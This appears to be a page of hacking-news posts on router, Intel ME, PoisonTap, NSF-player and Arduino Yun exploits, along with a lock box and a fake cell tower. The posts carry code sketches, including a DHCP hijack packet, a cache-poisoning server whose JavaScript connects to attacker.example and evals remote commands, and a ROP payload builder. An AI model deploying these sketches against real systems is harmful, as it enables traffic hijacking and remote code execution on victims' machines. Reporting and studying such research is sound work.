TP-Link Debug Protocol Gives Up Keys To Kingdom

If the headline makes today’s hack sound like it was easy, rest assured that it wasn’t. But if you’re interested in embedded device hacking, read on.

[Andres] wanted to install a custom OS firmware on a cheap home router, so he bought a router known to be reflashable, only to find that a newer firmware version made that difficult. We’ve all been there. But instead of throwing the device in the closet, [Andres] beat it into submission, discovering a bug in the firmware, exploiting it, and writing it up for the manufacturer. (And just as we’re going to press, he’s posted the code for the downgrade exploit here.)

This is not a weekend hack; it took a professional many hours of serious labor. But the job was made a lot easier because TP-Link left a debugging protocol active on the LAN interface, with no authentication required. [Andres] found most of the information he needed in patents, and soon had debugging insight into the running device.
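The write-up has the real protocol details; what we can sketch here is the very first step in this kind of work, which is simply checking whether the router answers unauthenticated traffic on its LAN side. The Python below is a minimal probe of that sort; the port number and probe payload are placeholders of ours for illustration, not values from [Andres]’s research.

```python
# A minimal sketch of probing a LAN-side debug service, assuming it speaks UDP.
# The port and probe payload below are placeholders, not details from the
# write-up -- substitute whatever the device actually listens for.
import socket

ROUTER_IP = "192.168.0.1"   # a typical TP-Link LAN address; adjust for your network
DEBUG_PORT = 1040           # assumed port for the debug service
PROBE = b"\x01" * 12        # placeholder probe packet

def probe_debug_service(host, port, payload, timeout=2.0):
    """Send a single UDP datagram and return any reply, or None on timeout."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(payload, (host, port))
        try:
            reply, _addr = sock.recvfrom(4096)
            return reply
        except socket.timeout:
            return None

if __name__ == "__main__":
    reply = probe_debug_service(ROUTER_IP, DEBUG_PORT, PROBE)
    if reply is None:
        print("No answer: the service may be absent, TCP-based, or filtered.")
    else:
        print(f"Got {len(reply)} bytes back; something unauthenticated is listening.")
```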

Continue reading “TP-Link Debug Protocol Gives Up Keys To Kingdom”

All I Want For Christmas Is A 4-Factor Biometric Lock Box

It’s the most wonderful time of the year! No, we’re not talking about the holiday season, although that certainly has its merits. What we mean is that it’s time for the final projects from [Bruce Land]’s ECE4760 class. With the giving spirit and their mothers in mind, [Adarsh], [Timon], and [Cameron] made a programmable lock box with four-factor authentication. That’s three factors more secure than your average Las Vegas hotel room safe, and with a display to boot.

Getting into this box starts with a four-digit code on a number pad. If it’s incorrect, the display will say so. Put in the right code and the system will wait four seconds for the next step, which involves three potentiometers. These are tuned to the correct value with a leeway of +/- 30. After another four-second wait, it’s on to the piezo-based knock detector, which listens for the right pattern. Finally, a fingerprint scanner makes sure that anyone who wants into this box had better plan ahead.
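To make that flow concrete, here is a quick desktop-Python sketch of the four-stage sequence. The real box runs on a PIC32 with actual peripherals; every reference value below (the keypad code, the potentiometer targets, the knock pattern) is a placeholder, with only the ±30 tolerance and the four-second pauses taken from the description above.

```python
# A desktop sketch of the four-factor check sequence described above. Each
# "factor" is mocked with a simple function; all reference values are placeholders.
import time

CORRECT_CODE = "4760"                 # placeholder keypad code
POT_TARGETS = (512, 300, 800)         # placeholder potentiometer targets (ADC counts)
POT_TOLERANCE = 30                    # +/- 30, as in the project description
KNOCK_PATTERN = [1, 0, 1, 1]          # placeholder knock pattern

def check_code(entered):
    return entered == CORRECT_CODE

def check_pots(readings):
    return all(abs(r - t) <= POT_TOLERANCE for r, t in zip(readings, POT_TARGETS))

def check_knock(pattern):
    return pattern == KNOCK_PATTERN

def check_fingerprint(match_flag):
    # In the real build an Arduino Uno talks to the fingerprint scanner and
    # reports a match; here we just accept a boolean.
    return match_flag

def try_unlock(code, pots, knock, fingerprint_ok):
    checks = [
        ("code", check_code(code)),
        ("potentiometers", check_pots(pots)),
        ("knock pattern", check_knock(knock)),
        ("fingerprint", check_fingerprint(fingerprint_ok)),
    ]
    for i, (name, ok) in enumerate(checks):
        if not ok:
            print(f"Incorrect {name}: the box stays locked.")
            return False
        if i < len(checks) - 1:
            time.sleep(4)   # the four-second pause before the next factor
    print("All four factors passed: unlock!")
    return True

if __name__ == "__main__":
    try_unlock("4760", (500, 320, 790), [1, 0, 1, 1], True)
```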

This project is based on Microchip’s PIC32-based Microstick II, which [Professor Land] started teaching with in 2015. It also uses an Arduino Uno to handle the fingerprint scanner. The team has marketability in mind for this project, and in the video after the break, they walk through the factory settings and user customization.

We have seen many ways to secure a lock box. How about a laser-cut combination safe or a box with a matching NFC ring?

Continue reading “All I Want For Christmas Is A 4-Factor Biometric Lock Box”

Neutralizing Intel’s Management Engine

Five or so years ago, Intel rolled out something horrible. Intel’s Management Engine (ME) is a completely separate computing environment running on Intel chipsets that has access to everything. The ME has network access, access to the host operating system, memory, and cryptography engine. The ME can be used remotely even if the PC is powered off. If that sounds scary, it gets even worse: no one knows what the ME is doing, and we can’t even look at the code. When — not ‘if’ — the ME is finally cracked open, every computer running on a recent Intel chip will have a huge security and privacy issue. Intel’s Management Engine is the single most dangerous piece of computer hardware ever created.

Researchers are continuing work on deciphering the inner workings of the ME, and we sincerely hope this Pandora’s Box remains closed. Until then, there’s now a new way to disable Intel’s Management Engine.

Previously, the first iteration of the ME found in GM45 chipsets could be removed entirely, but only because that ME lived on a chip separate from the northbridge. For Core i3/i5/i7 processors, the ME is integrated into the northbridge, and until now efforts to disable an ME this closely coupled to the CPU have failed. Completely removing the ME from these systems is impossible, but disabling parts of it is not. There is one caveat: if the ME’s boot ROM (stored in an SPI Flash) does not find a valid Intel signature, the PC will shut down after 30 minutes.

A few months ago, [Trammell Hudson] discovered that erasing the first page of the ME region did not shut down his Thinkpad after 30 minutes. This led [Nicola Corna] and [Federico Amedeo Izzo] to write a script that uses this exploit. Effectively, the ME still thinks it’s running, but it doesn’t actually do anything.
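The script by [Corna] and [Izzo] does the real work, including locating the ME region by parsing the flash descriptor, but the core idea is simple enough to sketch. The snippet below just blanks the first 4 KiB page of a dumped SPI flash image at an offset you supply by hand; the example offset is purely illustrative, and in practice you would let the real script find the region for you.

```python
# A bare-bones sketch of the core idea: blank the first 4 KiB page of the ME
# region in a dumped SPI flash image. The real script locates the ME region by
# parsing the flash descriptor and handles many more details; here the region
# offset must be supplied by hand and is purely illustrative.
import shutil
import sys

PAGE_SIZE = 0x1000  # one 4 KiB flash page

def blank_first_me_page(image_path, me_region_offset, out_path):
    shutil.copyfile(image_path, out_path)      # never modify the original dump
    with open(out_path, "r+b") as f:
        f.seek(me_region_offset)
        f.write(b"\xff" * PAGE_SIZE)           # erased flash reads back as 0xFF
    print(f"Blanked {PAGE_SIZE:#x} bytes at {me_region_offset:#x} in {out_path}")

if __name__ == "__main__":
    # Usage: python blank_me_page.py dump.bin 0x3000 dump_modified.bin
    # (0x3000 is a placeholder; read the real offset from your flash descriptor.)
    blank_first_me_page(sys.argv[1], int(sys.argv[2], 16), sys.argv[3])
```

On the hardware side, the dump and write-back happen over the flash chip’s SPI pins, which is where the BeagleBone and chip clip in the next paragraph come in.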

With a BeagleBone, an SOIC-8 chip clip, and a few breakout wires, you can dump the flash, run the script, and write the result back to effectively disable the ME. The exploit has only been confirmed to work on Sandy Bridge and Ivy Bridge processors; it should also work on Skylake, while Haswell and Broadwell remain untested.

Separating or disabling the ME from the CPU has been a major focus of the libreboot and coreboot communities. The inability to do so has, until now, made the future prospects of truly free computing platforms grim. The ME is in everything, and CPUs without an ME are getting old. Even though we don’t have the ability to remove the ME, disabling it is the next best thing.

PoisonTap Makes Raspberry Pi Zero Exploit Locked Computers

[Samy Kamkar], leet haxor extraordinaire, has taken a treasure trove of exploits and backdoors and turned it into a simple hardware device that hijacks all network traffic, enables remote access, and does it all while a machine is locked. It’s PoisonTap, and it’s based on the Raspberry Pi Zero for all that awesome tech blog cred we crave so much.

PoisonTap takes a Raspberry Pi Zero and configures it as a USB gadget emulating a network device. When this Pi-turned-USB-Ethernet adapter is plugged into a computer (even a locked one), the computer sends out a DHCP request, and PoisonTap responds by telling the machine that the entire IPv4 space is part of the Pi’s local network. All Internet traffic on the locked computer is then sent over PoisonTap, and if a browser is running, its requests are sent to this tiny exploit device.
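That DHCP trick is easy to picture as a packet. The scapy sketch below builds an OFFER whose subnet mask is all zeros, so the whole IPv4 space looks like it lives on the USB “LAN”. This is an illustration of the idea, not [Samy]’s actual PoisonTap code, and the addresses, MAC, lease time, and interface name are all placeholders.

```python
# A scapy sketch of the trick described above: answer a client's DISCOVER with
# an OFFER whose subnet mask is 0.0.0.0, so every IPv4 address appears to be
# on the local USB network. Addresses and MAC below are placeholders.
from scapy.all import Ether, IP, UDP, BOOTP, DHCP, mac2str, sendp

def build_offer(client_mac, xid):
    return (
        Ether(dst=client_mac)
        / IP(src="1.0.0.1", dst="255.255.255.255")
        / UDP(sport=67, dport=68)
        / BOOTP(op=2, xid=xid, yiaddr="1.0.0.100", siaddr="1.0.0.1",
                chaddr=mac2str(client_mac))
        / DHCP(options=[("message-type", "offer"),
                        ("server_id", "1.0.0.1"),
                        ("subnet_mask", "0.0.0.0"),   # "everything is local"
                        ("router", "1.0.0.1"),
                        ("lease_time", 600),
                        "end"])
    )

if __name__ == "__main__":
    offer = build_offer("aa:bb:cc:dd:ee:ff", 0x1234)
    offer.show()                      # inspect the crafted packet
    # sendp(offer, iface="usb0")      # would answer a real DISCOVER on the gadget interface
```

The reason this wins even on a machine with a perfectly good Wi-Fi connection is that operating systems prefer routes to directly connected subnets over the default gateway, so the low-priority USB interface still captures the traffic.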

With all network access going through PoisonTap, cookies are siphoned off, and the browser cache is poisoned with an exploit providing a WebSocket to the outside world. Even after PoisonTap is unplugged, an attacker can remotely send commands to the target computer and force the browser to execute JavaScript. From there, it’s all pretty much over.
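As a rough picture of the cache-poisoning half, here is a sketch of the kind of long-lived, script-carrying response an interception point could return for a popular JavaScript URL, so the browser keeps serving a backdoor long after the device is gone. The WebSocket endpoint, cache lifetime, and payload are placeholders of ours, not the actual PoisonTap payload.

```python
# A sketch of a poisoned response: serve a "JavaScript file" with very
# aggressive caching headers so the browser keeps the backdoor around.
# The C2 host and lifetime are placeholders; this is not the PoisonTap payload.
from http.server import BaseHTTPRequestHandler, HTTPServer

BACKDOOR_JS = b"""
// Poisoned cache entry: phone home over a WebSocket and eval whatever arrives.
var ws = new WebSocket("ws://attacker.example:1337/c2");   // placeholder C2 host
ws.onmessage = function (msg) { eval(msg.data); };
"""

class PoisoningHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "application/javascript")
        # Tell the browser to keep this copy essentially forever.
        self.send_header("Cache-Control", "public, max-age=31536000, immutable")
        self.send_header("Content-Length", str(len(BACKDOOR_JS)))
        self.end_headers()
        self.wfile.write(BACKDOOR_JS)

if __name__ == "__main__":
    # In a real attack this sits in the middle of hijacked HTTP traffic;
    # here it just serves the poisoned response on localhost for inspection.
    HTTPServer(("127.0.0.1", 8080), PoisoningHandler).serve_forever()
```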

Of course, any device designed to plug into a USB port and run a few exploits has a few limitations. PoisonTap only works if a browser is running. PoisonTap does not work on HTTPS cookies with the Secure cookie flag set. PoisonTap does not work if you have filled your USB ports with epoxy. There are a thousand limitations to PoisonTap, all of which probably don’t apply if you take PoisonTap into any office, plug it into a computer, and walk away. That is, after all, the point of this exploit.

As with all ub3r-1337 pen testing tools, we expect to see a version of PoisonTap for sale next August in the vendor area of DEF CON. Don’t buy it. A Raspberry Pi Zero costs $5, a USB OTG cable less than that, and all the code is available on GitHub. If you buy a device like PoisonTap, you are too technically illiterate to use it.

[Samy] has a demonstration of PoisonTap in the video below.

Continue reading “PoisonTap Makes Raspberry Pi Zero Exploit Locked Computers”

A Linux Exploit That Uses 6502 Code

With ubiquitous desktop computing now several decades old, anyone creating an operating system distribution faces a backwards compatibility problem. Each upgrade brings its own set of new features, but it must maintain compatibility with the features of previous versions or risk alienating users. If you are a critic of Microsoft products for their bloat, this is one of the factors behind that particular issue.

As well as a problem of compatibility, this extra software overhead creates one of security. A piece of code descended from a DOS word processor of the 1980s, for example, was not originally written with any idea that it might one day be hiding in a library on a machine visible to the entire world over the Internet. Our subject today is a good example: just such a vulnerability, hiding in an old piece of code whose purpose is to maintain an obscure piece of backward compatibility. [Chris Evans] has demonstrated a vulnerability in an Ubuntu release by playing an NES music file that contains exploit code, emulated by the player on a virtual 6502 processor.

The NES Sound Format (NSF) is a music file standard that packages Nintendo game music for playback. Rather than recorded audio, an NSF file carries the 6502 code needed to generate the music, and it is this code, run by the player, that triggers the vulnerability. When you open an NSF file on the affected Ubuntu system it finds its way via your music player and the gstreamer multimedia framework to libgstnsf.so, a gstreamer plugin for playing NSF files.
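For the curious, the NSF container itself is tiny: a fixed 128-byte header followed by the 6502 code and data. The little parser below pulls out the fields a player cares about, including the load, init, and play addresses of that code. The offsets follow the commonly published NSF layout, so treat this as a sketch and check it against the spec before relying on it.

```python
# A small parser for the fixed 128-byte NSF header, to make the "music file
# full of 6502 code" point concrete. Field offsets follow the commonly
# published NSF layout; verify them against the spec before relying on this.
import struct
import sys

def parse_nsf_header(path):
    with open(path, "rb") as f:
        header = f.read(0x80)
    if len(header) < 0x80 or header[:5] != b"NESM\x1a":
        raise ValueError("not an NSF file")
    version, total_songs, start_song = header[5], header[6], header[7]
    load, init, play = struct.unpack_from("<HHH", header, 0x08)
    title = header[0x0E:0x2E].split(b"\0", 1)[0].decode("ascii", "replace")
    return {
        "version": version,
        "songs": total_songs,
        "starting_song": start_song,
        "load_addr": load,   # where the 6502 code/data is loaded
        "init_addr": init,   # 6502 routine called once per song
        "play_addr": play,   # 6502 routine called on every frame tick
        "title": title,
    }

if __name__ == "__main__":
    info = parse_nsf_header(sys.argv[1])
    print(f"'{info['title']}': {info['songs']} song(s), "
          f"init=${info['init_addr']:04X} play=${info['play_addr']:04X}")
```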

Rather unbelievably, this plugin works by emulating a real 6502 as found in a NES to derive the musical output, and it is somewhere here that the vulnerability exists. So not only do we have layer upon layer of backward compatibility to play an obscure music file format, there is also a software emulation of some 8-bit silicon from the 1970s. [Chris] comments “Is that cool or what?”, and while we agree that a 6502 emulator buried in a modern distro is cool, we can’t help thinking something’s been lost along the way.

A proof-of-concept is provided for Ubuntu 12.04. It’s an older release, but he points out that while he thinks the most recent releases should not contain exactly the same vulnerability, it certainly exists in more than one still-supported version. There’s also a worrying twist: thanks to the vagaries of Ubuntu’s file manager, the file is processed automatically as soon as the folder containing it is opened from the GUI. The year 2000 called; it wants its auto-opening Windows ME worms back.

Sadly we suspect the 6502 lurking in this music player can’t be put to more general-purpose use. If you manage it, please do share it with us! But if emulated 6502s are your thing, take a look at this 150MHz 6502 co-processor for an Acorn BBC Micro that someone made using a Raspberry Pi.

[via r/hacking]

6502 image, Dirk Oppelt, (CC BY-SA 3.0) via Wikimedia Commons.

ArduWorm: A Malware For Your Arduino Yun

We’ve been waiting for this one. A worm was written for the Internet-connected Arduino Yun that gets in through a memory corruption exploit in the ATmega32u4 that’s used as the serial bridge. The paper (as PDF) is a bit technical, but if you’re interested, it’s a great read. (Edit: The link went dead. Here is our local copy.)

The crux of the hack is getting the AVR to run out of RAM, which more than a few of us have done accidentally from time to time. Here, the hackers write more and more data into memory until they end up writing into the heap, where data that’s used to control the program lives. Writing a worm for the AVR isn’t as easy as it was on PCs in the 1990s, because the AVR only executes code from flash, so you can’t simply inject your own code into RAM and jump to it. However, if you know where enough useful functions are located in flash, you can just reuse what’s there. These kinds of return-oriented programming (ROP) tricks were enough for the researchers to write a worm.
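For readers who haven’t met ROP before, the payload itself is nothing but data: enough filler to overrun the vulnerable buffer, followed by a list of addresses of code that already lives in flash, arranged so each return lands in the next borrowed routine. The sketch below packs such a chain in Python; every address is hypothetical, and AVR specifics such as word addressing and the byte order of return addresses on the stack are glossed over, so this illustrates the idea rather than reproducing the ArduWorm payload.

```python
# A purely illustrative sketch of assembling a return-oriented payload as plain
# data: filler that overruns the vulnerable buffer, then a chain of addresses
# of code that already exists in flash. All addresses are hypothetical, and the
# big-endian packing is chosen only for illustration.
import struct

BUFFER_LEN = 64                   # assumed size of the overflowed buffer
FILLER = b"A" * BUFFER_LEN        # data that legitimately fits in the buffer

# Hypothetical addresses of useful routines already present in flash.
GADGETS = [
    0x1A2C,   # e.g. "read a byte from the serial bridge"
    0x0B90,   # e.g. "write a byte to a chosen RAM address"
    0x2F10,   # e.g. "jump back to the read loop"
]

def build_payload(gadgets):
    # Overflow past the buffer, then lay down the chain of return addresses so
    # each "return" lands in the next borrowed piece of code.
    chain = b"".join(struct.pack(">H", addr) for addr in gadgets)
    return FILLER + chain

if __name__ == "__main__":
    payload = build_payload(GADGETS)
    print(f"{len(payload)} byte payload:", payload.hex())
```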

In the end, the worm is persistent, can spread from Yun to Yun, and can do most everything that you’d love/hate a worm to do. In security, we all know that a chain is only as strong as its weakest link, and here the attack isn’t against the OpenWRT Linux system running on the big chip, but rather against the small AVR chip playing a support role. Because the AVR is completely trusted by the Linux system, once you’ve got that, you’ve won.

Will this amount to anything in practice? Probably not. There are tons of systems out there with much more easily accessed vulnerabilities: hard-coded passwords and poor encryption protocols. Attacking all the Yuns in the world wouldn’t be worth one’s time. It’s a very cool proof of concept, and in our opinion, that’s even better.

Thanks [Dave] for the great tip!

Stealth Cell Tower Inside This Office Printer Calls To Say I Love You

If you look around the street furniture of your city, you may notice some ingenious attempts to disguise cell towers. There are fake trees, lamp posts with bulges, and plenty you won’t even be aware of, concealed within commercial signage. The same people who are often the first to complain when they have no signal, it seems, do not want to be reminded how that signal reaches them. On a more sinister note, government agencies have been known to make use of fake cell towers of a different kind: those which impersonate legitimate towers in order to track and intercept communications.

In investigating the phenomenon of fake cells, [Julian Oliver] has brought together both strands by creating a fake cell tower hidden within an innocuous office printer. It catches the phones it finds within its range, and sends them a series of text messages that appear to be from someone the phone’s owner might know. It then prints out a transcript of the resulting text conversation along with all the identifying information it can harvest from the phone. As a prank it also periodically calls phones connected to it and plays them the Stevie Wonder classic I Just Called To Say I Love You.

In hardware terms the printer has been fitted with a Raspberry Pi 3, a BladeRF software-defined transceiver, and a pair of omnidirectional antennas which are concealed behind the toner cartridge hatch. Software comes via YateBTS, and [Julian] provides a significant amount of information about its configuration as well as a set of compiled binaries.

In one sense this project is a fun prank, yet on the other hand it demonstrates how accessible the technology to impersonate a cell tower and hijack passing phones has now become. We’re afraid to speculate, though, as to the length of custodial sentence you might receive were you caught using one as a private individual.

We’ve considered Stingray cell phone trackers before here at Hackaday, as well as a couple of possible counter-measures: an app that uses a database of known towers to spot fakes, and a solution that relies on an SDR receiver to gather cell tower data from a neighbourhood.

[via Hacker News]